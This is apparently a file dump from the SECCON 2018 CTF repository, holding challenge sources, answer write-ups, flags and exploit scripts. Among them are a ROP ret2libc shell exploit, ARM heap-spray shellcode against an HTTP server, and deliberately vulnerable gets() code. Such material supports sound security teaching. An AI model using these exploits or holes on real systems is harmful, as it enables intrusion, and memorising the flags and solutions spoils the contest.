 7 | the password is `perl -e "print time()"`, current time when zipped it.
 8 | but, flag.txt was created on same time.
 9 | 
10 | $ unzip -l files/flag.zip 
11 | Archive:  files/flag.zip
12 |   Length      Date    Time    Name
13 | ---------  ---------- -----   ----
14 |        32  10-27-2018 00:10   flag.txt
15 | ---------                     -------
16 |        32                     1 file
17 | 
18 | the unix time of "10-27-2018 00:10" is password.
19 | 
20 | $ python exploit.py 
21 | 1540566641
22 | $ unzip flag.zip 
23 | Archive:  flag.zip
24 | [flag.zip] flag.txt password: 1540566641 (<-input)
25 |   inflating: flag.txt                
26 | $ cat flag.txt 
27 | SECCON{We1c0me_2_SECCONCTF2o18}
28 | 


--------------------------------------------------------------------------------
/Forensics/Unzip/build/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{We1c0me_2_SECCONCTF2o18}
2 | 


--------------------------------------------------------------------------------
/Forensics/Unzip/build/flag.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Forensics/Unzip/build/flag.zip


--------------------------------------------------------------------------------
/Forensics/Unzip/build/key:
--------------------------------------------------------------------------------
1 | We1c0me_2_SECCONCTF2o18


--------------------------------------------------------------------------------
/Forensics/Unzip/build/makefile.sh:
--------------------------------------------------------------------------------
1 | echo 'SECCON{'`cat key`'}' > flag.txt
2 | zip -e --password=`perl -e "print time()"` flag.zip flag.txt
3 | 


--------------------------------------------------------------------------------
/Forensics/Unzip/exploit.py:
--------------------------------------------------------------------------------
1 | import struct
2 | data = open("files/flag.zip", "rb").read()
3 | print struct.unpack("<L", data[0x2b:0x2b+4])[0]
4 | 


--------------------------------------------------------------------------------
/Forensics/Unzip/files/unzip.zip_26c0cb5b40e9f78641ae44229cda45529418183f:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Forensics/Unzip/files/unzip.zip_26c0cb5b40e9f78641ae44229cda45529418183f


--------------------------------------------------------------------------------
/Forensics/Unzip/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{We1c0me_2_SECCONCTF2o18}
2 | 


--------------------------------------------------------------------------------
/Forensics/Unzip/question.txt:
--------------------------------------------------------------------------------
1 | Unzip
2 | Unzip flag.zip.
3 | [FILE]
4 | 


--------------------------------------------------------------------------------
/Media/Needle_in_a_haystack/47601075-3a71de00-da06-11e8-90a3-2a043017b42d.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Media/Needle_in_a_haystack/47601075-3a71de00-da06-11e8-90a3-2a043017b42d.png


--------------------------------------------------------------------------------
/Media/Needle_in_a_haystack/answer.txt:
--------------------------------------------------------------------------------
 1 | ## Overview
 2 | Read the opening and closing of the curtain at the right end of the screen, the window of Westin Osaka (the far rightmost row, the 12th from the top).
 3 | Morse code signal with short point set to 1 minute is transmitted.
 4 | 
 5 | ## solution
 6 | 
 7 | Since the opening and closing of the curtain corresponds to Morse code,
 8 | When the curtain is open (when the light is on as indoor light can be seen at night, turning it on) is turned on
 9 | Turn off when the curtain is closed (when the light is off as the room light is not visible at night)
10 | , Morse code is decoded.
11 | 
12 | The signal is sent only once.
13 | 
14 | Although there are several assumed solutions, basically you create time lapse movies and read the signals.
15 | 
16 | Solution 1
17 | If it is time lapse of a realistic length, one room of the building flashes suspiciously suspiciously and soon notices it.
18 | 
19 | It is good to make an image analysis program by turning ON = ON, decode it, and decode it with eyes.
20 | However, when doing with a program, it will not move at the time of switching to the day mode, so it is a mechanism to +1 the regret.
21 | 
22 | Solution 2
23 | When the position of the signal is unknown or intuition is intolerable, pixels are arranged in one dimension and binarized, and when it is arranged side by side on the time axis, Morse 's streak appears in several places, so decode it.
24 | Likewise, since the streak disappears (or reverses) where it switches to the day mode, fine adjustment by hand is necessary.
25 | 
26 | 
27 | --------------
28 | ## 概要
29 | 画面右端のビル、ウェスティン大阪の窓(一番右端の列、上から12番目)のカーテンの開閉を読み取る。
30 | 短点を1分としたモールス信号を送信している。
31 | 
32 | ## 解法
33 | 
34 | カーテンの開閉がモールス信号に対応しているので、
35 | カーテンが開いているとき（夜は室内の明かりが見えるので点灯時）を ON
36 | カーテンが閉じているとき（夜は室内の明かりが見えないので消灯時）を OFF
37 | として、モールス信号をデコードする。
38 | 
39 | 信号は一度しか送られない。
40 | 
41 | 想定解はいくつかあるが、基本的にはタイムラプス動画を作成して信号を読み取る。
42 | 
43 | 解法 1
44 | 現実的な長さのタイムラプスにすれば、あからさまに怪しくビルの一室が点滅するので、すぐに気づく。
45 | 
46 | 点灯 = ON として画像解析プログラムを作ってデコードするも良し、目でデコードするも良し。
47 | 但し、プログラムでやる場合は昼モードに切り替わる時点で動かなくなるので、悔しさを +1 する仕掛け。
48 | 
49 | 解法 2
50 | 信号の位置が分からない場合や勘が鈍い場合、画素を1次元に並べ2値化し、それを時間軸に並べて見ると何箇所かにモールスのスジが出現するので、それをデコードする。
51 | 同じく、昼モードに切り替わるところでスジが消える（もしくは反転する）ので、手での微調整が必要。
52 | 


--------------------------------------------------------------------------------
/Media/Needle_in_a_haystack/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON(SOMETIMES-A-SECRET-MESSAGE-BROADCASTS-BOLDLY)


--------------------------------------------------------------------------------
/Media/Needle_in_a_haystack/question.txt:
--------------------------------------------------------------------------------
1 | Needle in a haystack
2 | 
3 | https://www.youtube.com/watch?v=sTKP2btHSBQ
4 | 
5 | 


--------------------------------------------------------------------------------
/Pwn/CLV2/README.md:
--------------------------------------------------------------------------------
1 | # CLV2
2 | 


--------------------------------------------------------------------------------
/Pwn/CLV2/build/compile.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | 
3 | gcc -o main main.c -Ofast -Wl,-z,relro,-z,now -fpic -pie
4 | strip -s ./main
5 | 


--------------------------------------------------------------------------------
/Pwn/CLV2/build/sha256.h:
--------------------------------------------------------------------------------
 1 | 
 2 | /*********************************************************************
 3 | * Filename:   sha256.h
 4 | * Author:     Brad Conte (brad AT bradconte.com)
 5 | * Copyright:
 6 | * Disclaimer: This code is presented "as is" without any guarantees.
 7 | * Details:    Defines the API for the corresponding SHA1 implementation.
 8 | *********************************************************************/
 9 | 
10 | #ifndef SHA256_H
11 | #define SHA256_H
12 | 
13 | /*************************** HEADER FILES ***************************/
14 | #include <stddef.h>
15 | 
16 | /****************************** MACROS ******************************/
17 | #define SHA256_BLOCK_SIZE 32            // SHA256 outputs a 32 byte digest
18 | 
19 | /**************************** DATA TYPES ****************************/
20 | typedef unsigned char BYTE;             // 8-bit byte
21 | typedef unsigned int  WORD;             // 32-bit word, change to "long" for 16-bit machines
22 | 
23 | typedef struct {
24 | 	BYTE data[64];
25 | 	WORD datalen;
26 | 	unsigned long long bitlen;
27 | 	WORD state[8];
28 | } SHA256_CTX;
29 | 
30 | /*********************** FUNCTION DECLARATIONS **********************/
31 | void sha256_init(SHA256_CTX *ctx);
32 | void sha256_update(SHA256_CTX *ctx, const BYTE data[], size_t len);
33 | void sha256_final(SHA256_CTX *ctx, BYTE hash[]);
34 | 
35 | #endif   // SHA256_H
36 | 


--------------------------------------------------------------------------------
/Pwn/CLV2/files/CLV2.tar.gz_f0c6c1a6b8ae7cff168c8b506fb69dbede6665d7:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/CLV2/files/CLV2.tar.gz_f0c6c1a6b8ae7cff168c8b506fb69dbede6665d7


--------------------------------------------------------------------------------
/Pwn/CLV2/files/README.md:
--------------------------------------------------------------------------------
1 | # File to deploy
2 | 
3 | Deploy files in this directory except README.md
4 | 
5 | sha256sum of CLV2.tar.gz : c17bf3d21eec0fad789f8161d09a709b262e1d1c3333b0af8547743409cbda19
6 | 


--------------------------------------------------------------------------------
/Pwn/CLV2/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{2628146539839fbeb3602f109569ab6b}
2 | 


--------------------------------------------------------------------------------
/Pwn/CLV2/questions.txt:
--------------------------------------------------------------------------------
 1 | [Challenge Title]
 2 | 
 3 | CLV2
 4 | 
 5 | 
 6 | [Challenge document]
 7 | 
 8 | Pwn me, and Prove yourself
 9 | 
10 | 
11 | nc clv2.pwn.seccon.jp 31337
12 | 


--------------------------------------------------------------------------------
/Pwn/classic/build/classic.c:
--------------------------------------------------------------------------------
 1 | // gcc -fno-stack-protector classic.c -o classic
 2 | #include <stdio.h>
 3 | 
 4 | #define BUF_SIZE 64
 5 | 
 6 | char *gets(char *s);
 7 | 
 8 | __attribute__((constructor))
 9 | int init(){
10 | 	setbuf(stdout, NULL);
11 | 	setbuf(stderr, NULL);
12 | 	return 0;
13 | }
14 | 
15 | int main(void){
16 | 	char local[BUF_SIZE];
17 | 
18 | 	puts("Classic Pwnable Challenge");
19 | 
20 | 	printf("Local Buffer >> ");
21 | 	gets(local);
22 | 
23 | 	puts("Have a nice pwn!!");
24 | 
25 | 	return 0;
26 | }
27 | 


--------------------------------------------------------------------------------
/Pwn/classic/exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | from sc_expwn import *  # https://raw.githubusercontent.com/shift-crops/sc_expwn/master/sc_expwn.py
 3 | 
 4 | bin_file = './classic'
 5 | context(os = 'linux', arch = 'amd64')
 6 | # context.log_level = 'debug'
 7 | 
 8 | #==========
 9 | 
10 | env = Environment('debug', 'local', 'remote')
11 | env.set_item('mode',    debug = 'DEBUG', local = 'PROC', remote = 'SOCKET')
12 | env.set_item('target',  debug   = {'argv':[bin_file], 'aslr':False}, \
13 |                         local   = {'argv':[bin_file]}, \
14 |                         remote  = {'host':'classic.pwn.seccon.jp', 'port':17354})
15 | env.set_item('libc',    debug   = None, \
16 |                         local   = None, \
17 |                         remote  = 'libc-2.23.so')
18 | env.select()
19 | 
20 | #==========
21 | 
22 | binf = ELF(bin_file)
23 | addr_got_main       = binf.got['__libc_start_main']
24 | addr_main           = binf.sep_function['main']
25 | 
26 | libc = ELF(env.libc) if env.libc else binf.libc
27 | offset_libc_main        = libc.sep_function['__libc_start_main']
28 | 
29 | #==========
30 | 
31 | def attack(conn):
32 |     rop = ROP(binf)
33 |     rop.puts(addr_got_main)
34 |     rop.call(addr_main)
35 | 
36 |     exploit = 'a'*0x48
37 |     exploit += str(rop)
38 | 
39 |     conn.sendlineafter('>> ', exploit)
40 |     conn.recvuntil('pwn!!\n')
41 | 
42 |     addr_libc_main = u(conn.recvuntil('\n', drop=True))
43 |     libc.address = addr_libc_main - offset_libc_main
44 |     info('addr_libc_base    = 0x{:08x}'.format(libc.address))
45 |     addr_libc_str_sh    = next(libc.search('/bin/sh'))
46 | 
47 |     rop = ROP(libc)
48 |     rop.system(addr_libc_str_sh)
49 | 
50 |     exploit = 'a'*0x48
51 |     exploit += str(rop)
52 | 
53 |     conn.sendlineafter('>> ', exploit)
54 | 
55 | #==========
56 | 
57 | if __name__=='__main__':
58 |     conn = communicate(env.mode, **env.target)
59 |     attack(conn)
60 |     conn.interactive()
61 |     
62 | #==========
63 | 


--------------------------------------------------------------------------------
/Pwn/classic/files/classic_aa9e979fd5c597526ef30c003bffee474b314e22:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/classic/files/classic_aa9e979fd5c597526ef30c003bffee474b314e22


--------------------------------------------------------------------------------
/Pwn/classic/files/libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/classic/files/libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253


--------------------------------------------------------------------------------
/Pwn/classic/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{w4rm1ng_up_by_7r4d1710n4l_73chn1qu3}
2 | 


--------------------------------------------------------------------------------
/Pwn/classic/question.txt:
--------------------------------------------------------------------------------
1 | Classic Pwn
2 | 
3 | Host: classic.pwn.seccon.jp
4 | Port: 17354
5 | 


--------------------------------------------------------------------------------
/Pwn/internet_of_seat/build/.gitignore:
--------------------------------------------------------------------------------
1 | .gdb_history
2 | *.o


--------------------------------------------------------------------------------
/Pwn/internet_of_seat/build/Makefile:
--------------------------------------------------------------------------------
 1 | CFLAGS=-O2 -marm -std=c99
 2 | LDFLAGS=-marm
 3 | CC:=/home/jinmo/cross-compiler-armv5l/bin/armv5l-gcc
 4 | # CFLAGS=-fsanitize=address -g
 5 | # LDFLAGS=-fsanitize=address -g
 6 | 
 7 | # CFLAGS=-g
 8 | # LDFLAGS=-g
 9 | 
10 | all: main Makefile
11 | 
12 | main: main.o
13 | 
14 | main.o: main.c
15 | 
16 | clean:
17 | 	rm main.o main -f
18 | 


--------------------------------------------------------------------------------
/Pwn/internet_of_seat/build/build.sh:
--------------------------------------------------------------------------------
 1 | make || exit
 2 | SRC=$PWD/main
 3 | TARGET=$PWD/../files/
 4 | cp main ../main
 5 | cd ~/core
 6 | cp $SRC ./sbin/httpd
 7 | chmod 755 ./sbin/httpd
 8 | chown root:root ./sbin/httpd
 9 | 
10 | find . -print0 | cpio --null -ov --format=newc | gzip -9 > $TARGET/initramfs.cpio.gz
11 | 


--------------------------------------------------------------------------------
/Pwn/internet_of_seat/build/main:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/internet_of_seat/build/main


--------------------------------------------------------------------------------
/Pwn/internet_of_seat/build/piCore.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/internet_of_seat/build/piCore.gz


--------------------------------------------------------------------------------
/Pwn/internet_of_seat/exploit.py:
--------------------------------------------------------------------------------
  1 | from pwn import *
  2 | from hashlib import md5
  3 | 
  4 | HOST, PORT = '0.0.0.0', 1337
  5 | # HOST, PORT = 'internet-of-seat.pwn.seccon.jp', 1337
  6 | 
  7 | x = remote(HOST, PORT)
  8 | argv = x.recvuntil('>>').split('"')[1]
  9 | 
 10 | i = 0
 11 | while True:
 12 |     if md5(argv + "%x"%i).hexdigest().startswith('00000'):
 13 |         x.sendline('%x'%i)
 14 |         break
 15 |     i += 1
 16 | 
 17 | x.recvuntil('Your port: ')
 18 | PORT = int(x.recvline().strip())
 19 | 
 20 | x.recvuntil('Listening on')
 21 | 
 22 | import threading
 23 | 
 24 | def receiver(x):
 25 |     d = ''
 26 |     while True:
 27 |         c = x.recv(1024)
 28 |         if c == '':
 29 |             break
 30 |         sys.stdout.write(c)
 31 |         d += c
 32 | 
 33 | t = threading.Thread(target=receiver, args=(x, ))
 34 | t.start()
 35 | 
 36 | r = remote(HOST, PORT)
 37 | rs = []
 38 | 
 39 | context.update(arch='arm')
 40 | 
 41 | size = 2 ** 31 - 1
 42 | r.send('GET / HTTP/1.1\r\nContent-Length: %d\r\n\r\n' % size)
 43 | 
 44 | def spray(r, size):
 45 | 	time.sleep(0.3)
 46 | 	rs.append(r)
 47 | 	r.send('GET / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n%x\n' % size)
 48 | 
 49 | for i in range(8):
 50 | 	spray(remote(HOST, PORT), 0x40000)
 51 | 
 52 | for i in range(15):
 53 | 	spray(remote(HOST, PORT), 0x80000)
 54 | 
 55 | # rs.append(remote(HOST, PORT))
 56 | # r.send("GET / HTTP/1.1\r\nContent-Length: 100000\r\n\r\n" + ('A' * 0x1337))
 57 | 
 58 | # for c in rs:
 59 | # 	c.send('a')
 60 | 
 61 | pause()
 62 | r.send("aa")
 63 | 
 64 | shellcode = asm(
 65 | 	shellcraft.arm.linux.dup2(4, 0) +
 66 | 	shellcraft.arm.linux.dup2(4, 1) +
 67 | 	shellcraft.arm.linux.dup2(4, 2) +
 68 |     """
 69 |     ldr r7, =0x41410068
 70 |     push {r7}
 71 |     ldr r7, =0x732f2f2f
 72 |     push {r7}
 73 |     ldr r7, =0x6e69622f
 74 |     push {r7}
 75 |     mov  r0, sp
 76 |     /* push argument array ['sh\x00'] */
 77 |     /* push 'sh\x00\x00' */
 78 |     ldr r7, =0x6873
 79 |     push {r7}
 80 |     eor  r12, r12 /* 0 (#0) */
 81 |     push {r12} /* null terminate */
 82 |     mov  r1, #4
 83 |     add r1, sp
 84 |     mov  r12, r1
 85 |     push {r12} /* 'sh\x00' */
 86 |     mov  r1, sp
 87 |     eor  r2, r2 /* 0 (#0) */
 88 |     /* call execve() */
 89 |     mov  r7, #SYS_execve /* 0xb */
 90 |     svc  0
 91 | 	"""
 92 | 	)
 93 | 
 94 | target = 0x920e0
 95 | target = 0x52044
 96 | # target = 0x52008
 97 | 
 98 | target -= 4
 99 | count = 0
100 | chunk = p32(0x5c)
101 | chunk += p32(6) + p32(1) + p32(0) + p32(0) * 3 + p32(target + 4 + 0x58 + len(shellcode) + 4) + p32(0) + p32(0) + p32(0x11dc4) + p32(0) + p32(0x100) + p32(0) * 2
102 | chunk += p32(0) * 2 + p32(0x7fffffff) + p32(0) + p32(1) + p32(1) + p32(0) * 2
103 | sh = target + len(chunk)
104 | chunk += shellcode
105 | chunk += p32(0x20)
106 | chunk = chunk
107 | r.send('A' * (target - 0x30))
108 | r.send(chunk)
109 | 
110 | pause()
111 | 
112 | for c in rs:
113 | 	time.sleep(0.1)
114 | 	c.send(p32(sh))
115 | 
116 | r.interactive()
117 | 


--------------------------------------------------------------------------------
/Pwn/internet_of_seat/files/README.md:
--------------------------------------------------------------------------------
1 | # File to deploy
2 | 
3 | Deploy files in this directory except README.md
4 | 
5 | sha256sum of files.zip : c5d362e76e8b5655e10a8b2cbb2408c3af477f3dcad4859c1bfb815c68120d9e
6 | 


--------------------------------------------------------------------------------
/Pwn/internet_of_seat/files/files.zip_0b0c98eb5f5f7d7127eb3727ae97efb1a9740b70:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Pwn/internet_of_seat/files/files.zip_0b0c98eb5f5f7d7127eb3727ae97efb1a9740b70


--------------------------------------------------------------------------------
/Pwn/internet_of_seat/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{5ea4f1ee2820cf8d6151937236f8f69e}


--------------------------------------------------------------------------------
/Pwn/internet_of_seat/question.txt:
--------------------------------------------------------------------------------
1 | Who doesn't love IoT? Based on real life. Flag is on /flag.txt .
2 | (QEMU running on Ubuntu 16.04 latest for setting environment)
3 | 
4 | nc internet-of-seat.pwn.seccon.jp 1337
5 | 


--------------------------------------------------------------------------------
/Pwn/kindvm/answer.txt:
--------------------------------------------------------------------------------
 1 | 概要：独自VM(とても小さい)のバナー表示に使うファイル名を置き換えてフラグを出力させる問題
 2 | 
 3 | ===== 問題について =====
 4 | 
 5 | 
 6 | 32bit ELF (not stripped)
 7 | Tested on Ubuntu 16.04
 8 | 
 9 | 
10 | ===== ヒントについて =====
11 | 
12 | 
13 | 命令数の少ない独自VMで、ヒントを見つけ出しながら解法へ近づくようにしました。
14 | 
15 | ヒントは3つあり、それぞれ以下の条件で発火するようになっています。
16 | 
17 | 1. gets関数によるスタックBOF
18 | 2. 独自VM内のヒント用命令を実行する
19 | 3. 独自VM内の加算処理(insn_add)において加算結果が負の値になる
20 | 
21 | それぞれ、フラグと同じディレクトリ内にあるhint1.txt,hint2.txt,hint3.txtが読み込まれて表示されるようになります。
22 | 
23 | 各ヒントを頼りにexploitコードを作成します。
24 | 
25 | 
26 | ===== 想定解法 =====
27 | 
28 | 
29 | この独自VMでは命令実行時にバナー表示を行います。
30 | このバナーはフラグと同じディレクトリ内にあるbanner.txtから読み込み、表示をしています。
31 | 
32 | 独自VM管理用の構造体の中にはこのbanner.txtの文字列へのポインタが格納されていますが、独自VMの命令に不備があり、このポインタを書き換えることができます。
33 | 
34 | このポインタを、ユーザ名を保持する領域へのポインタに書き換えてしまいます(ユーザ名はflag.txtとしておく)
35 | 
36 | 最終的に、独自VMが実行を終了した際、バナー表示をするつもりがユーザ名として入力したflag.txtを読み込んでしまい、フラグが出力される、という流れになっています。
37 | 


--------------------------------------------------------------------------------
/Pwn/kindvm/build/Makefile:
--------------------------------------------------------------------------------
 1 | kindvm:main.o kindvm.o util.o
 2 | 	gcc -m32 -o kindvm main.o kindvm.o util.o -Wl,-z,relro
 3 | 
 4 | main.o:main.c
 5 | 	gcc -m32 -c main.c
 6 | 
 7 | kindvm.o:kindvm.c
 8 | 	gcc -m32 -c kindvm.c
 9 | 
10 | util.o:util.c
11 | 	gcc -m32 -c util.c
12 | 
13 | clean:
14 | 	rm -f main.o kindvm.o util.o
15 | 


--------------------------------------------------------------------------------
/Pwn/kindvm/build/banner.txt:
--------------------------------------------------------------------------------
1 |  _    _           _                 
2 | | | _(_)_ __   __| |_   ___ __ ___  
3 | | |/ / | '_ \ / _` \ \ / / '_ ` _ \ 
4 | |   <| | | | | (_| |\ V /| | | | | |
5 | |_|\_\_|_| |_|\__,_| \_/ |_| |_| |_|
6 |                                     
7 | 


--------------------------------------------------------------------------------
/Pwn/kindvm/build/hint1.txt:
--------------------------------------------------------------------------------
 1 |  _   _ _       _   _    ____ _____ _____   _ 
 2 | | | | (_)_ __ | |_/ |  / ___| ____|_   _| | |
 3 | | |_| | | '_ \| __| | | |  _|  _|   | |   | |
 4 | |  _  | | | | | |_| | | |_| | |___  | |   |_|
 5 | |_| |_|_|_| |_|\__|_|  \____|_____| |_|   (_)
 6 |                                              
 7 | 
 8 | Nice try! The theme of this binary is not Stack-Based BOF!
 9 | However, your name is not meaningless...
10 | 


--------------------------------------------------------------------------------
/Pwn/kindvm/build/hint2.txt:
--------------------------------------------------------------------------------
1 |  _   _ _       _   ____     ____ _____ _____   _ 
2 | | | | (_)_ __ | |_|___ \   / ___| ____|_   _| | |
3 | | |_| | | '_ \| __| __) | | |  _|  _|   | |   | |
4 | |  _  | | | | | |_ / __/  | |_| | |___  | |   |_|
5 | |_| |_|_|_| |_|\__|_____|  \____|_____| |_|   (_)
6 |                                                  
7 | Nice try! You can analyze vm instruction and execute it!
8 | Flag file name is "flag.txt".
9 | 


--------------------------------------------------------------------------------
/Pwn/kindvm/build/hint3.txt:
--------------------------------------------------------------------------------
1 |  _   _ _       _   _____    ____ _____ _____   _ 
2 | | | | (_)_ __ | |_|___ /   / ___| ____|_   _| | |
3 | | |_| | | '_ \| __| |_ \  | |  _|  _|   | |   | |
4 | |  _  | | | | | |_ ___) | | |_| | |___  | |   |_|
5 | |_| |_|_|_| |_|\__|____/   \____|_____| |_|   (_)
6 |                                                  
7 | Nice try! You can cause Integer Overflow!
8 | The value became minus value. Minus value is important.
9 | 


--------------------------------------------------------------------------------
/Pwn/kindvm/build/kindvm.h:
--------------------------------------------------------------------------------
 1 | #ifndef KINDVM_H
 2 | #define KINDVM_H
 3 | 
 4 | #include <stdint.h>
 5 | 
 6 | #define MAX_NAME_LEN	10
 7 | #define MAX_REG_NUMBER	8
 8 | #define MAX_MEM_RANGE	1024
 9 | #define MAX_INSN_LENGTH	1024
10 | #define MAX_INSN_NUMBER	10
11 | 
12 | struct kindvm_control{
13 | 	unsigned int pc;
14 | 	unsigned int isstop;
15 | 	char *username;
16 | 	char *banner_file_name;
17 | 	void (*greeting)(void);
18 | 	void (*farewell)(void);
19 | };
20 | 
21 | struct kindvm_control *kc;
22 | int32_t *reg;
23 | uint8_t *mem;
24 | uint8_t *insn;
25 | 
26 | void (*func_table[MAX_INSN_NUMBER])(void);
27 | 
28 | void kindvm_abort(void);
29 | 
30 | void kindvm_setup(void);
31 | 
32 | char *input_username(void);
33 | 
34 | void input_insn(void);
35 | 
36 | void exec_insn(void);
37 | 
38 | uint8_t load_insn_uint8_t(void);
39 | uint16_t load_insn_uint16_t(void);
40 | uint32_t load_insn_uint32_t(void);
41 | 
42 | uint8_t load_mem_uint8_t(int16_t addr);
43 | uint16_t load_mem_uint16_t(int16_t addr);
44 | uint32_t load_mem_uint32_t(int16_t addr);
45 | 
46 | void store_mem_uint32_t(int16_t addr,uint32_t value);
47 | 
48 | unsigned int get_pc(void);
49 | unsigned int step(void);
50 | 
51 | void insn_nop(void);	// 00
52 | void insn_load(void);	// 01
53 | void insn_store(void);	// 02
54 | void insn_mov(void);	// 03
55 | void insn_add(void);	// 04
56 | void insn_sub(void);	// 05
57 | void insn_halt(void);	// 06
58 | void insn_in(void);	// 07
59 | void insn_out(void);	// 08
60 | void insn_hint(void);	// 09
61 | 
62 | void hint2(void);
63 | void hint3(void);
64 | 
65 | void func_greeting(void);
66 | void func_farewell(void);
67 | 
68 | #endif /* KINDVM_H */
69 | 


--------------------------------------------------------------------------------
/Pwn/kindvm/build/main.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | 
 3 | #include "kindvm.h"
 4 | #include "util.h"
 5 | 
 6 | // 1. Input "flag.txt" as username
 7 | // 2. Obtain user_name pointer
 8 | // 3. Overwrite banner_file_name
 9 | // 4. Obtain greeting pointer
10 | // 5. Overwrite farewell pointer
11 | 
12 | 
13 | int main(void){
14 | 	
15 | 	ctf_setup();
16 | 	kindvm_setup();
17 | 
18 | 	input_insn();
19 | 
20 | 	kc->greeting();
21 | 
22 | 	while(!kc->isstop){
23 | 		exec_insn();
24 | 	}
25 | 
26 | 	kc->farewell();
27 | 
28 | 	return 0;
29 | }
30 | 


--------------------------------------------------------------------------------
/Pwn/kindvm/build/util.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <malloc.h>
 3 | #include <sys/types.h>	//open
 4 | #include <sys/stat.h>	//open
 5 | #include <fcntl.h>	//open
 6 | #include <unistd.h>	//read
 7 | #include <signal.h>	//signal
 8 | #include <stdlib.h>	//exit
 9 | 
10 | #include "util.h"
11 | 
12 | void __stack_chk_fail(void){
13 | 	open_read_write("hint1.txt");
14 | 	exit(-1);
15 | }
16 | 
17 | void signal_handler_timeout(int sig){
18 | 	printf("\nOops! Sorry, it's TIME OUT !\n");
19 | 	exit(-1);
20 | }
21 | 
22 | 
23 | void ctf_setup(void){
24 | 	setvbuf(stdin,0x0,0x2,0x0);
25 | 	setvbuf(stdout,0x0,0x2,0x0);
26 | 	setvbuf(stderr,0x0,0x2,0x0);
27 | 	signal(SIGALRM,signal_handler_timeout);
28 | 	alarm(TIMEOUT);
29 | }
30 | 
31 | void open_read_write(char *filename){
32 | 	int fd;
33 | 	unsigned int file_size;
34 | 	char *buf;
35 | 	
36 | 	fd = open(filename,'r');
37 | 
38 | 	file_size = lseek(fd,0,SEEK_END);
39 | 	lseek(fd,0,SEEK_SET);
40 | 	buf = (char *)malloc(sizeof(char) * file_size);
41 | 	read(fd,buf,file_size);
42 | 	write(1,buf,file_size);
43 | 	close(fd);
44 | }
45 | 


--------------------------------------------------------------------------------
/Pwn/kindvm/build/util.h:
--------------------------------------------------------------------------------
 1 | #ifndef UTIL_H
 2 | #define UTIL_H
 3 | 
 4 | #define TIMEOUT 5
 5 | 
 6 | void __stack_chk_fail(void);
 7 | void signal_handler_timeout(int sig);
 8 | void ctf_setup(void);
 9 | void open_read_write(char *filename);
10 | 
11 | #endif /* UTIL_H */
12 | 


--------------------------------------------------------------------------------
/Pwn/kindvm/exploit.py:
--------------------------------------------------------------------------------
  1 | import socket
  2 | import struct
  3 | 
  4 | def p8(data):
  5 | 	return struct.pack('<B',data)
  6 | 
  7 | def vm_nop():
  8 | 	return p8(0)
  9 | 
 10 | def vm_load(reg,mem):
 11 | 	opc = p8(1)
 12 | 	opc += p8(reg)
 13 | 	opc += p8(mem >> 8)
 14 | 	opc += p8(mem & 255)
 15 | 	return opc
 16 | 
 17 | def vm_store(mem,reg):
 18 | 	opc = p8(2)
 19 | 	opc += p8(mem >> 8)
 20 | 	opc += p8(mem & 255)
 21 | 	opc += p8(reg)
 22 | 	return opc
 23 | 
 24 | def vm_mov(dst,src):
 25 | 	opc = p8(3)
 26 | 	opc += p8(dst)
 27 | 	opc += p8(src)
 28 | 	return opc
 29 | 
 30 | def vm_add(dst,src):
 31 | 	opc = p8(4)
 32 | 	opc += p8(dst)
 33 | 	opc += p8(src)
 34 | 	return opc
 35 | 
 36 | def vm_sub(dst,src):
 37 | 	opc = p8(5)
 38 | 	opc += p8(dst)
 39 | 	opc += p8(src)
 40 | 	return opc
 41 | 
 42 | def vm_halt():
 43 | 	return p8(6)
 44 | 
 45 | def vm_in(reg,value):
 46 | 	opc = p8(7)
 47 | 	opc += p8(reg)
 48 | 	opc += p8((value >> 24) & 255)
 49 | 	opc += p8((value >> 16) & 255)
 50 | 	opc += p8((value >> 8) & 255)
 51 | 	opc += p8(value & 255)
 52 | 	return opc
 53 | 
 54 | def vm_out(reg):
 55 | 	opc = p8(8)
 56 | 	opc += p8(reg)
 57 | 	return opc
 58 | 	
 59 | 
 60 | def vm_hint():
 61 | 	return p8(9)
 62 | 
 63 | def get_hint1(s):
 64 | 	s.recv(1024)	# Input your name : 
 65 | 	buf = 'A' * 20
 66 | 	buf += '\n'
 67 | 	s.send(buf)
 68 | 	print(s.recv(1024))
 69 | 
 70 | def get_hint2(s):
 71 | 	s.recv(1024)	# Input your name :
 72 | 	buf = 'user'
 73 | 	buf += '\n'
 74 | 	s.send(buf)
 75 | 
 76 | 	s.recv(1024)	# Input instruction : 
 77 | 	buf = vm_hint()
 78 | 	buf += '\n'
 79 | 	s.send(buf)
